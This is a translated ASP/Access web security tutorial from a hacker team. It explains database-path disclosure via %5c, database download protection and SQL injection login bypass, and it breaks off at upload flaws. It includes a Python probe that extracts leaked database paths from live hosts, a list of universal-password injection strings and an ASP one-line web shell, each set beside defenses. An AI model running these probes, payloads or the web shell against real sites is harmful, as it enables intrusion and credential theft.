Information Source: evil baboons Information Security Team
Author: outstand
Preface:
A classmate who had just finished his graduation project asked me which security issues an ASP site has to watch out for. I had not thought about it for a long time myself; this classmate is too serious! After learning HTML, JavaScript and ASP, everyone wants to build a personal homepage and put it on the Internet: a few pages after half a day's work, a backend grabbed from somewhere on the net and modified, and up it goes. That is exactly the moment to pay attention to the common security holes. They are old, but newcomers do not know them and keep making the same mistakes, so based on my earlier experience of defacing other people's systems I have written this summary for him. Hey, when you are new you are a cainiao; not knowing about a problem does not mean it does not exist! What follows is how homepages get defaced.
1. Database path disclosure
Principle:
The "%5c" disclosure is not a flaw in the web page itself; it abuses a quirk in how IIS decodes URLs. It works when IIS has been left with detailed error reporting on and the page author did not handle the error IIS raises. Why "%5c"? It is the URL (hexadecimal) encoding of the backslash "\", just another way of writing the same character. If you type a "\" into the address bar, IE converts it into "/", but "%5c" is submitted as is, and IIS decodes it back into "\" after receiving the request. Every file that opens the database uses Server.MapPath to turn the relative path of the .mdb into an absolute physical path, because the connection string has to name the physical path.
A URL only says where a file sits relative to the web root. Anyone who has set up IIS knows that every site has a physical directory on disk; Server.MapPath builds the real path as "physical root of the site + relative path of the page currently executing + the relative path you passed in". Windows separates the directories of a physical path with "\", while the virtual path in the URL uses "/", which is probably why IE rewrites "\" as "/" in the address bar. To IIS the two characters mean different things: when a decoded "\" turns up inside the virtual path, the rest of the relative path is resolved against the wrong directory, the database file is looked for where it does not exist, the connection fails, and IIS reports the error together with its cause, which is the absolute path of the database.
So all you have to do is put a "\" ("%5c") between the directory part of the URL and the page name, i.e. between the relative location of the database and its absolute directory. Replacing the rightmost "/" (the one just before the page name) is the most likely to succeed.
Conn.asp disclosure. The first variant makes the absolute path wrong; this one makes the relative path wrong. It generally shows up whenever conn.asp is not in the root directory but the page that includes it is. More precisely: Server.MapPath resolves a relative path against the page being executed, not against the included conn.asp, so as soon as the relative position between conn.asp and the file that includes it differs from what the connection string assumes, the open fails and the error reveals the database path.
Exploitation:
The following is a test on my own machine. Requesting
http://localhost/198816/index.asp works normally.
Change the URL to http://localhost/198816%5cindex.asp and you get:
Microsoft JET Database Engine (0x80004005)
File 'E:\10\data.mdb' not found.
/data.asp, line 11
The database path has been disclosed: we now know the file name and where it lives,
and we can download it:
type http://localhost/198816/data.mdb into IE and the download dialog appears.
Once you have the database, a password on it is no obstacle: an Access password recovery tool gets it in seconds. Now you can browse all of its contents. Backend passwords are usually stored as MD5 hashes, which can be looked up directly on an MD5 reverse-lookup website; if it is not there, that is bad luck, and only someone with plenty of bots would sit down and brute-force it slowly, which nobody really does!
The conn.asp disclosure is exploited in the same way!
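The manual test above, as an added Python example that is not part of the original article: a small probe that rewrites the rightmost "/" of a URL's path into %5c, requests the result, and pulls the physical .mdb path out of the Jet error page. The sample error body is constructed to look like the one shown above (it is not a real capture), and the helper names are the example's own. Run it with a URL as the first argument to probe a real host; with no argument it runs against the constructed sample.

```python
"""Probe for the classic IIS "%5c" database-path disclosure.

Added example (not from the original article).  It rewrites the rightmost
"/" of a URL's path into "%5c", requests the result, and extracts the
physical .mdb path from the Jet error page, i.e. the manual steps above.
"""
import re
import sys
from typing import Optional
from urllib.error import HTTPError
from urllib.parse import urlsplit, urlunsplit
from urllib.request import Request, urlopen

# A Windows drive path ending in .mdb somewhere after the Jet banner.
JET_LEAK_RE = re.compile(
    r"Microsoft JET Database Engine.*?'?([A-Za-z]:\\[^'<\r\n]+\.mdb)'?",
    re.S | re.I,
)

# Constructed sample of the error page shown above (not a real capture).
SAMPLE_ERROR_BODY = (
    "Microsoft JET Database Engine error '80004005'\n\n"
    "File 'E:\\10\\data.mdb' not found.\n\n"
    "/data.asp, line 11\n"
)


def percent5c_variant(url: str) -> Optional[str]:
    """Replace the rightmost "/" of the URL path with "%5c".

    Returns None for pages in the site root ("/index.asp"): there is no
    directory to the left of the slash for IIS to mis-resolve.
    """
    parts = urlsplit(url)
    idx = parts.path.rfind("/")
    if idx <= 0:
        return None
    mutated = parts.path[:idx] + "%5c" + parts.path[idx + 1:]
    return urlunsplit(parts._replace(path=mutated))


def extract_leaked_mdb_path(body: str) -> Optional[str]:
    """Return the physical .mdb path from a Jet "not found" error, if present."""
    match = JET_LEAK_RE.search(body)
    return match.group(1) if match else None


def fetch(url: str) -> str:
    """GET the URL and return the body even on HTTP 500 (ASP errors come back as 500)."""
    req = Request(url, headers={"User-Agent": "percent5c-probe"})
    try:
        with urlopen(req, timeout=10) as resp:
            return resp.read().decode("utf-8", "replace")
    except HTTPError as err:
        return err.read().decode("utf-8", "replace")


def probe(url: str, fetcher=fetch) -> Optional[str]:
    """Leaked physical .mdb path for url, or None if the server gave nothing away."""
    variant = percent5c_variant(url)
    if variant is None:
        return None
    return extract_leaked_mdb_path(fetcher(variant))


if __name__ == "__main__":
    if len(sys.argv) > 1:
        target, fetcher = sys.argv[1], fetch
    else:
        target, fetcher = "http://localhost/198816/index.asp", lambda u: SAMPLE_ERROR_BODY
    print("requesting", percent5c_variant(target))
    print("leaked database path:", probe(target, fetcher=fetcher))
```

The fetcher is injectable so the parsing can be checked offline; against a live host the interesting case is a 500 response, which is why fetch keeps the body of an HTTPError instead of discarding it.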
Defense methods:
Add error handling to the database connection file. I put this at the beginning of data.asp:
On Error Resume Next
and this at the end:
If Err Then
    Err.Clear
    Set Conn = Nothing
    Response.Write "fuck!"
    Response.End
End If
Now request the page with %5c again and all that comes back is "fuck!". Disclosure failed! Keep in mind that On Error Resume Next only hides the error text; every statement after a failed Conn.Open keeps running, so check Err right after the Open if later code depends on the connection.
Next: how to stop someone downloading your database even when they know its path.
2. Database Security
ASP with an Access database is the most common combination, and the biggest weakness of Access databases is that they are easily found, downloaded, and then mined for accounts and passwords. There are several common ways to prevent database downloads; if you know better ones, please tell me, I am a cainiao too:
1. Give the database a weird name nobody can guess. Useless against path disclosure, and Google may have indexed the database path anyway.
2. Put special characters such as # or %24 ($) in the database name, relying on URL encoding to block the download. A "#" in a URL starts the fragment, so the browser never sends it and the request misses the file, but anyone who encodes it as %23 gets past this.
3. Remove the suffix altogether. With no extension the system cannot map the file to a handler, so it cannot be downloaded. I tested this on XP with a FAT32 volume and the file could still be downloaded; I have not tested other systems, so if you have, let me know, thanks!
4. Use the suffix of a system file type, e.g. .db or .temp. I have heard the system refuses to serve files with these suffixes! (Whether it does depends on the IIS version's MIME mappings; IIS 6 and later answer 404 for an extension that has no mapping.)
5. Create a nodown table in the database with a field of type OLE Object.
6. The most common method on the net: change the database suffix to one that IIS hands to a script engine, such as .asp.
Method 6 is the most widely used one on the Internet, but it is not perfect. If someone can write into the database, for instance through a guestbook, it becomes dangerous: once <%execute(request("a"))%> is stored in the database, requesting the .asp-suffixed database file runs that line, and it executes whatever code is submitted in the parameter a.
This can be prevented as well. Put a fragment such as <%loop<%1=2<%2=1 into an OLE Object field: the ASP parser chokes on it, so the file cannot be executed, and because IIS hands it to the script engine it cannot be downloaded either. The field has to be an OLE Object because Jet stores text fields as Unicode, whereas the parser needs the raw ASCII bytes "<%"; an OLE Object field stores exactly the bytes you give it. I have done this in two ways.
Method 1, by hand in Access: create a nodown table with a nodown field of type OLE Object, and create a text file whose content is <%loop<%1=2<%2=1. Open the nodown table, select the nodown field, right-click, choose Insert Object, then Create from File, browse to the text file and add it. Rename the database with the .asp suffix. Requesting it now gives:
Active Server Pages, ASP 0116 (0x80004005)
The Script block lacks the Script close tag (%>).
/198816/dataasp.asp, line 577
That means it worked. Note that the nodown table should be created before the other tables, so that the fragment comes first in the file (I am not sure this is strictly necessary).
Method 2, with ASP code: add the nodown table and field to the database with the following script:
<%
db = "data.mdb"    ' path of the database, relative to this page
Set conn = Server.CreateObject("ADODB.Connection")
constr = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & Server.MapPath(db)
conn.Open constr
' create the table with a single OLE Object field; the same field name is used below
conn.Execute "create table nodown (nodown oleobject)"
Set rs = Server.CreateObject("ADODB.Recordset")
SQL = "select * from nodown"
rs.Open SQL, conn, 1, 3
rs.AddNew
' write the two raw ASCII bytes "<" and "%" into the OLE Object field
rs("nodown").AppendChunk chrB(Asc("<")) & chrB(Asc("%"))
rs.Update
rs.Close
Set rs = Nothing
conn.Close
Set conn = Nothing
%>
There are many more methods on the Internet; I will not repeat them beyond these two. One more database problem: the file does not shrink after a lot of data has been deleted. Just use Tools > Database Utilities > Compact and Repair Database in Access!
My own settings are as follows:
Complex passwords stored as MD5 hashes; the nodown table and field added with the first method; the database renamed with the .asp suffix to %24#$%da#%ta@#%conn#.asp.
I think the homepage is safe this way, but no security is absolute.
3. Universal passwords
This is the legendary 'or'='or'. It is very harmful, since it lets you skip the backend login check and walk straight into the admin area, and it is still found everywhere.
Principle:
If you enter 'or'='or' in both fields, the statement
SQL = "select * from admin where adminname='" & Request.Form("adminname") & "' and adminpass='" & Request.Form("adminpass") & "'"
becomes
SQL = "select * from admin where adminname=''or'='or'' and adminpass=''or'='or''"
Each comparison is closed by the first quote of the payload and followed by an or, so the WHERE clause no longer checks the submitted values at all: the query returns the admin records and the authentication check is skipped.
Exploitation:
Any of the following can be entered as the backend account or password (the quotes are the important part: they close the string literal the page builds):
1: "or "a"="a
2: ')or('a'='a
3: or 1=1--
4: 'or 1=1--
5: a'or' 1=1--
6: "or 1=1--
7: 'or'a'='a
8: "or"="a'='a
9: 'or''='
10: 'or'='or'
11: the shortest universal login password: 'or'1
12: 'or 1 or'='or'
And there are many more! Note that Access has no -- comment syntax, so the forms ending in -- are for other databases; against ASP+Access use the ones that close the quote at both ends, such as 'or''='.
Precaution:
One way is to filter out the single quote (with other databases you may also have to filter the other characters that delimit strings). For example:
Dim name, pass
name = Replace(Trim(Request.Form("name")), "'", "")
pass = md5(Replace(Trim(Request.Form("pass")), "'", ""))
Stripping quotes only protects string comparisons; a numeric field built by concatenation is still injectable, so where the driver supports it, pass values as parameters (ADODB.Command) instead of concatenating them.
I also added a verification code to the login:
ivcode = Trim(Request.Form("ivcode"))
where ivcode is a variable defined in the configuration .asp file, which makes things safer: even if someone knows the password or this vulnerability exists, they cannot log in to the backend without knowing the defined ivcode value! (It is a second static secret, so it is only as safe as the configuration file it lives in.)
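The bypass described under Principle and the quote-stripping fix from this section, as an added Python example that is not part of the original article. SQLite stands in for the Access database: the concatenated query is the article's, while the constructed admin table, the function names and the password s3cret are the example's own assumptions. The payload is 'or''=' (number 9 in the list above), chosen because its truth does not depend on how the engine treats a stray string literal the way 'or'='or' does.

```python
"""Universal-password login bypass ('or''=') next to the article's fix and the robust one.

Added example, not the article's own code.  sqlite3 stands in for the
Access/Jet database the article targets; the query is the article's
concatenated "select * from admin where adminname='...' and adminpass='...'".
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample: one admin account; password kept in clear for the demo."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table admin (adminname text, adminpass text)")
    conn.execute("insert into admin values (?, ?)", ("admin", "s3cret"))
    conn.commit()
    return conn


def build_sql_vulnerable(adminname: str, adminpass: str) -> str:
    """The article's query, built by string concatenation: user input becomes SQL."""
    return ("select * from admin where adminname='" + adminname
            + "' and adminpass='" + adminpass + "'")


def login_vulnerable(conn: sqlite3.Connection, adminname: str, adminpass: str) -> bool:
    """Broken: a row comes back whenever the WHERE clause is true, not when the password matches."""
    return conn.execute(build_sql_vulnerable(adminname, adminpass)).fetchone() is not None


def strip_quotes(value: str) -> str:
    """The article's mitigation: Replace(Trim(Request.Form(...)), "'", "")."""
    return value.strip().replace("'", "")


def login_quote_stripped(conn: sqlite3.Connection, adminname: str, adminpass: str) -> bool:
    """Still concatenates, but the payload can no longer close the string literal."""
    return login_vulnerable(conn, strip_quotes(adminname), strip_quotes(adminpass))


def login_parameterized(conn: sqlite3.Connection, adminname: str, adminpass: str) -> bool:
    """The robust fix: bound parameters are data and are never parsed as SQL."""
    row = conn.execute(
        "select * from admin where adminname=? and adminpass=?",
        (adminname, adminpass),
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    db = make_db()
    payload = "'or''='"
    print(build_sql_vulnerable("anything", payload))
    for label, login in (("vulnerable", login_vulnerable),
                         ("quote-stripped", login_quote_stripped),
                         ("parameterized", login_parameterized)):
        print(f"{label:15} real password: {login(db, 'admin', 's3cret')}  "
              f"payload as password: {login(db, 'anything', payload)}")
```

With the payload in the password field the concatenated clause reads adminpass=''or''='' and, because AND binds tighter than OR, the trailing ''='' makes the whole WHERE true. Stripping quotes defeats this payload only because both fields are strings; the parameterized version is the one to copy.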
4. Upload
Upload vulnerabilities are harder to understand; you may not be familiar with capturing packets, modifying them and replaying the upload with nc, so practise a few times. A personal homepage lets you upload various kinds of files, such as rar, gif and swf, and these are stored in separate directories, so the upload form asks for the file type and passes the type's path along to the upload page. Does that sound familiar? That is exactly what creates the upload vulnerability!
Principle:
1. FilePath. This is the variable that the upload page passes to the page that saves the file.